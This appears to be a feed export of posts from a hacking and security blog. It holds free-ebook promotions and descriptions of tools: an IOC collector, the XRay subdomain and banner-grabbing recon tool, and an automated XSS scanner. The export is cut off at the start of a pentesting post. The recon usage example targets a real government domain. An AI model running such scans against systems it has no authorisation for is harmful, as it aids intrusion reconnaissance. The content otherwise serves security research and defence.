tag:blogger.com,1999:blog-82449234994463300762024-02-07T22:42:52.552+05:30Hackers Online Club (HOC)Hackers Online Club (HOC) |
Get Updates of latest Tools, Infosec, Vulnerabilities and Cyber Security tutorials.HackersOnlineClubhttp://www.blogger.com/profile/09881375775340083915noreply@blogger.comBlogger1097125tag:blogger.com,1999:blog-8244923499446330076.post-88287930901580236132020-04-20T11:55:00.000+05:302020-04-20T11:55:45.037+05:30Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgV4I0zx6Q_07Xqwjl1iYeiFIyWbXFeweK7DbYFmTUYKPiUo6xN4-BLcbpBk9vNXJQSJ9KAWAZtysGSIpczzzaBYx-kX4_oESY_XZpJpVAIuJHGPrChpfxb4eeYme6MdwqhBaTRS8_0md/s1600/Web+Codding.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="750" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgV4I0zx6Q_07Xqwjl1iYeiFIyWbXFeweK7DbYFmTUYKPiUo6xN4-BLcbpBk9vNXJQSJ9KAWAZtysGSIpczzzaBYx-kX4_oESY_XZpJpVAIuJHGPrChpfxb4eeYme6MdwqhBaTRS8_0md/s640/Web+Codding.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Peak the languages that power the web.</span></h3>
<br />
With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.<br />
<br />
If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.<br />
<br />
Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.<br />
<br />
<b>Get the lowdown on coding basics</b><br />
<ul style="text-align: left;">
<li>Review HTML and CSS</li>
<li>Make sense of JavaScript, jQuery, PHP, and MySQL</li>
<li>Create code for web and mobile apps</li>
<li>There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!</li>
</ul>
<br />
<b><span style="color: #073763;">Free offer expires 4/22/2020</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile288/prgm.cgi" target="_blank"><img border="0" data-original-height="996" data-original-width="698" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2igEJYOzJoKwuAP_R2yLR4yLy9v-tXTITd8rkVENPD7hjQYwPgJ-k3C7uMSKg-AUpu23bPPI-WB43YKJEkarwij06b1_ICPeimyMU5xAUcaAiq-wkSgbRvrAzKehwE8qGSc1rAoJYsrc/s320/Screenshot+2020-04-20+at+11.51.40+AM.png" width="224" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile288/prgm.cgi" target="_blank"><b>DOWNLOAD NOW!</b></a></div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-57141089000645601642020-01-31T15:09:00.000+05:302020-01-31T15:10:22.297+05:30Smart OSINT Collection of Common IOC Types<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFaDpc66Cf9-ghz_87cgX_3DQvASLiNcVx8P-VyE2yE_YgY8wea8sAArOv3T7ebZuQ05-PdltiTNLnrM8Lw1Nm0rIcmnTig6uXniXPYaV8Tmmw-Crx1dE-AALUJJYgWQ4Ay6aEhV_4QlMV/s1600/Mimir+OSINT+Collections.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="662" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFaDpc66Cf9-ghz_87cgX_3DQvASLiNcVx8P-VyE2yE_YgY8wea8sAArOv3T7ebZuQ05-PdltiTNLnrM8Lw1Nm0rIcmnTig6uXniXPYaV8Tmmw-Crx1dE-AALUJJYgWQ4Ay6aEhV_4QlMV/s1600/Mimir+OSINT+Collections.png" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">Smart OSINT Collection of Common IOC (Indicator of compromise) Types</span></h2>
<br />
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.<br />
<br />
The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Base Collection</span></h3>
For network based IOCs, Mimir gathers basic information including:<br />
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>Whois</li>
<li>ASN</li>
<li>Geolocation</li>
<li>Reverse DNS</li>
<li>Passive DNS</li>
<li>Collection Sources</li>
</ul>
<br />
Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.<br />
<ul style="text-align: left;">
<li>PassiveTotal</li>
<li>VirusTotal</li>
<li>DomainTools</li>
<li>OPSWAT</li>
<li>Google SafeBrowsing</li>
<li>Shodan</li>
<li>PulseDive</li>
<li>CSIRTG</li>
<li>URLscan</li>
<li>HpHosts</li>
<li>Blacklist checks</li>
<li>Spam blacklist checks</li>
<li>Risk Scoring</li>
</ul>
<br />
The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Machine Learning Predictions</span></h3>
The machine learning prediction results come from the CSIRT Gadgets projects <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Output</span></h3>
Mimir offers results output in various options including local file reports or exporting the results to an external service.<br />
<br />
<b><span style="color: #073763;">stdout (console output)</span></b><br />
normalizes result data, printed with headers and subheaders per module<br />
<br />
<b><span style="color: #073763;">JSON file</span></b><br />
beautified output to local file<br />
<span style="color: #073763;"><br /></span>
<b><span style="color: #073763;">Excel</span></b><br />
uses multiple sheets per IOC type<br />
<br />
<b><span style="color: #073763;">MISP</span></b><br />
commit new indicators<br />
<br />
<b><span style="color: #073763;">ThreatConnect</span></b><br />
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)<br />
<br />
<span style="font-size: large;"><a href="https://github.com/deadbits/mimir" target="_blank">Download Smart OSINT Collection</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-12861257487755670582019-12-04T12:13:00.001+05:302019-12-04T12:13:44.642+05:30Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99zwJYlPre6I4bIIN8YExVT-IHvuYA7bEw9s8TSUUlDCneyyTtHQIlSS2kAfRSYHbmUIfvDAPawsYS_BDUGLd43FJqzacaJpwBQ3vdSW23-0mEXVvkiE7sODuHwrC7drDK6wAU8T_T6EK/s1600/Cyber+Security+Courses.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99zwJYlPre6I4bIIN8YExVT-IHvuYA7bEw9s8TSUUlDCneyyTtHQIlSS2kAfRSYHbmUIfvDAPawsYS_BDUGLd43FJqzacaJpwBQ3vdSW23-0mEXVvkiE7sODuHwrC7drDK6wAU8T_T6EK/s1600/Cyber+Security+Courses.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Understand the nitty-gritty of Cybersecurity with ease</span></h3>
<br />
It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.<br />
<br />
This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.<br />
<br />
<b><span style="color: #073763;">Features include how to:</span></b><br />
<br />
<ul style="text-align: left;">
<li>Align your security knowledge with industry leading concepts and tools</li>
<li>Acquire required skills and certifications to survive the ever changing market needs</li>
<li>Learn from industry experts to analyse, implement, and maintain a robust environment</li>
<li>By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.</li>
</ul>
<br />
<br />
<b>Free offer expires on 17 Dec 2019</b><br />
<br />
Offered Free by: Packt<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><a href="https://hackersonlineclub.tradepub.com/free/w_pacb115/prgm.cgi" target="_blank">Download Now</a></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_pacb115/prgm.cgi" target="_blank"><img border="0" data-original-height="604" data-original-width="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYeJ112jlz9eUmyoiHQWyN3AQMAfq6no_oZPA-i6jueJMKqL3tHCOc-6nqiEaRqMaGtig7agPWumRGmdt4rWTvIWa_4JKjBaPC3_6Ux6IrYWB5hAvZh6Wl3vQ41O-HYAAVWkRKw8WtzJKC/s1600/Cyber+security+-+The+Beginner+Guide.png" /></a></div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-47574144372852701142019-11-25T13:16:00.000+05:302019-11-25T13:16:47.214+05:30Best Practices For Protecting Against Phishing, Ransomware and Email Fraud<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIpDW5YCMNDqdbGjOyewCnHvRLSPOrxkuw511hJ-m2eO88eLKyAOHG9MjfmOa84HAuzOgKr7MZFkIalVxzjEfGUs3mNEzlEPejm6XSTg5dVePbUTPIWu3JTIB2p7K1hwyVxcqQ9xsuiyb/s1600/Research+WhitePaper+KnowBe4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="310" data-original-width="546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIpDW5YCMNDqdbGjOyewCnHvRLSPOrxkuw511hJ-m2eO88eLKyAOHG9MjfmOa84HAuzOgKr7MZFkIalVxzjEfGUs3mNEzlEPejm6XSTg5dVePbUTPIWu3JTIB2p7K1hwyVxcqQ9xsuiyb/s1600/Research+WhitePaper+KnowBe4.png" /></a></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h3 style="text-align: left;">
<span style="color: #073763;">"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"</span></h3>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-weight: normal;">Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.</span><span style="font-weight: normal;"><br /></span><span style="font-weight: normal;"><br /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;">Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.</span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span><span style="font-weight: normal;">Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.</span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><a href="https://hackersonlineclub.tradepub.com/free/w_knoc60/prgm.cgi" target="_blank"><span style="font-size: large;">Download Free eBook</span></a></span></div>
<h2 style="text-align: left;">
</h2>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-26358780711606737022019-11-11T15:23:00.001+05:302019-11-11T15:25:52.988+05:30XRay - Using For Recon Mapping And OSINT Suite<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSge_MxNfPWns77RqMYvD-VGXViWvDclTJYSAutb6fKFKpUCZ2sshp1z5mgWFY5qp7sBXmg2eBtNoixuMqqdieqSfIrdA6LQIqHNguKOrzpauegIcVFPZ5ghy1XJmjnn5w7V3pfpNYjo2W/s1600/XRAY.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="725" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSge_MxNfPWns77RqMYvD-VGXViWvDclTJYSAutb6fKFKpUCZ2sshp1z5mgWFY5qp7sBXmg2eBtNoixuMqqdieqSfIrdA6LQIqHNguKOrzpauegIcVFPZ5ghy1XJmjnn5w7V3pfpNYjo2W/s640/XRAY.png" width="640" /></a></div>
<br />
XRay is a software for recon, mapping and OSINT gathering from public networks.<br />
<br />
XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How Does it Work?</span></h3>
<b>XRay is a very simple tool, it works this way:</b><br />
<ol style="text-align: left;">
<li>It'll bruteforce subdomains using a wordlist and DNS requests.</li>
<li>For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.</li>
<li>If a ViewDNS API key is provided, for every subdomain historical data will be collected.</li>
<li>For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.</li>
<li>Eventually the data is presented to the user on the web ui.</li>
</ol>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Grabbers and Collectors</span></h3>
<ul style="text-align: left;">
<li>HTTP Server, X-Powered-By and Location headers.</li>
<li>HTTP and HTTPS robots.txt disallowed entries.</li>
<li>HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).</li>
<li>HTML title tag.</li>
<li>DNS version.bind. and hostname.bind. records.</li>
<li>MySQL, SMTP, FTP, SSH, POP and IRC banners.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Notes</span></h3>
<b>Shodan API Key</b><br />
<br />
The <span style="background-color: white; color: #274e13; font-family: "courier new" , "courier" , monospace;">shodan.io</span> API key parameter ( <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-shodan-key KEY</span> ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).<br />
<br />
<b>ViewDNS API Key</b><br />
<br />
If a <a href="http://viewdns.info/" target="_blank"><span id="goog_2079958298"></span>ViewDNS<span id="goog_2079958299"></span></a> API key parameter (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -viewdns-key KEY</span> ) is passed, domain historical data will also be retrieved.<br />
<br />
<b>Anonymity and Legal Issues</b><br />
<br />
The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Building a Docker image</span></h3>
To build a Docker image with the latest version of XRay:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/evilsocket/xray.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd xray</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker build -t xraydocker .</span><br />
<br />
Once built, XRay can be started within a Docker container using the following:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com </span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Manual Compilation</span></h3>
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$GOPATH/bin</span> to your <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$PATH</span>.<br />
<br />
<b>Then:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">go get github.com/evilsocket/xray</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd $GOPATH/src/github.com/evilsocket/xray/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">make</span><br />
<br />
You'll find the executable in the build folder.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Options:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -address string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> IP address to bind the web ui server to. (default "127.0.0.1")</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -consumers int</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Number of concurrent consumers to use for subdomain enumeration. (default 16)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -domain string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Base domain to start enumeration from.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -port int</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> TCP port to bind the web ui server to. (default 8080)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -preserve-domain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Do not remove subdomain from the provided domain name.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -session string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Session file name. (default "<domain-name>-xray-session.json")</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -shodan-key string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Shodan API key.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -viewdns-key string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ViewDNS API key.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -wordlist string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Wordlist file to use for enumeration. (default "wordlists/default.lst")</span><br />
<br />
<b>Example:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov</span><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">____ ___</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">\ \/ /</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> \ RAY v 1.0.0b</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> / by Simone 'evilsocket' Margaritelli</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/___/\ \</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> \_/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">@ Saving session to fbi.gov-xray-session.json</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">@ Web UI running on http://127.0.0.1:8080/</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/evilsocket/xray" target="_blank">Download XRay</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-91031263600701618762019-10-14T19:52:00.001+05:302019-10-14T19:53:53.724+05:30Hacking for Dummies, 6th Edition ($29.99 Value) Free<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXVF7-iRdsvX_95Mw9NCT1Fcd9H1L7K_dIYAt8wMQkn4uUNsMKPyczDs8ttlNebCoxMQfReccwEpYnggrIkcP3uB3y5-k3Nz_gOmFAKjnLg2wvo9A5x5OaNXCXB69F5pdk7TBrOsfeLp2x/s1600/Keyboard+Hackers-compressed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXVF7-iRdsvX_95Mw9NCT1Fcd9H1L7K_dIYAt8wMQkn4uUNsMKPyczDs8ttlNebCoxMQfReccwEpYnggrIkcP3uB3y5-k3Nz_gOmFAKjnLg2wvo9A5x5OaNXCXB69F5pdk7TBrOsfeLp2x/s1600/Keyboard+Hackers-compressed.jpg" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">Stop hackers before they hack you!</span></h3>
<br />
In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.<br />
<br />
This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.<br />
<ul style="text-align: left;">
<li>Get up to speed on Windows 10 hacks </li>
<li>Learn about the latest mobile computing hacks</li>
<li>Get free testing tools </li>
<li>Find out about new system updates and improvements</li>
<li>There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile275/prgm.cgi" target="_blank"><img border="0" data-original-height="600" data-original-width="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Sgeejr2rR22YWzD_EcEvMDBFKCVu4FSHdK7kFKkadM92EzvZ2DI_Y1o_T9HHf3T2SkG8ZgIwxA3OQt5Y86X6I4c2cBSPm3kZPYfqyTJdFnE1C0tTdWLGexQqmk71_KAzzC5yKMNkcYGV/s1600/Hacking+For+dummies+6th+Edition.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><a href="https://hackersonlineclub.tradepub.com/free/w_wile275/prgm.cgi" target="_blank">DOWNLOAD NOW</a></span></div>
<br />
<br />
Free offer expires 10/15/19<br />
<br />
Offered Free by: Wiley</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-90537527859654108022019-10-14T13:58:00.002+05:302019-10-14T14:00:18.772+05:30TraXSS - Automated XSS Vulnerability Scanner <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghkkzCxRE_j02pan-R3S4Nx1iMMowdPRircUaY-oSKCpzzPEAG-XuqKqlZUrjabNsMvyZHhQIJvHj3M8oaJpa5zMtb6xch6yQT0TQsJrlGPbAZa2Vw6gpkIAO3sRX5VofslpBlIzMRhEpK/s1600/TraXSS.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="717" height="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghkkzCxRE_j02pan-R3S4Nx1iMMowdPRircUaY-oSKCpzzPEAG-XuqKqlZUrjabNsMvyZHhQIJvHj3M8oaJpa5zMtb6xch6yQT0TQsJrlGPbAZa2Vw6gpkIAO3sRX5VofslpBlIzMRhEpK/s640/TraXSS.png" width="640" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span><ul style="text-align: left;">
<li><span style="color: #073763;">Automated Vulnerability Scanner for XSS </span></li>
<li><span style="color: #073763;">Written in Python3 </span></li>
</ul>
</h3>
<br />
Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Getting Started</span></h3>
<b>Prerequisites</b><br />
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">brew install cask chromedriver</span><br />
<br />
Alternatively, find a version for other operating systems here: <span style="font-family: "courier new" , "courier" , monospace;">https://sites.google.com/a/chromium.org/chromedriver/downloads</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Run the command:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install -r requirements.txt</span><br />
<br />
<b>Running Traxss</b><br />
Traxx can be started with the command:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python3 traxss.py</span><br />
<br />
This will launch an interactive CLI to guide you through the process.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Types of Scans</span></h3>
Full Scan with HTML<br />
<br />
Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Full Scan w/o HTML</span></h3>
This scan will run the query scan only.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Fast Scan w/o HTML</span></h3>
This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Fast Scan w/o HTML</span></h3>
This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Contributing</span></h3>
Thank you for your interest! All types of contributions are welcome.<br />
<ul style="text-align: left;">
<li>Fork and clone this repository</li>
<li>Create your branch from the master branch</li>
<li>Please open your PR with the master branch as the base</li>
</ul>
<br />
<span style="font-size: large;"><a href="https://github.com/M4cs/traxss" target="_blank">Download TraXSS</a></span></div>
HackersOnlineClubhttp://www.blogger.com/profile/09881375775340083915noreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-21333208275929588832019-10-11T00:27:00.000+05:302020-03-31T18:45:45.448+05:30Penta- Open Source All-in-one CLI To Automate Pentesting <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
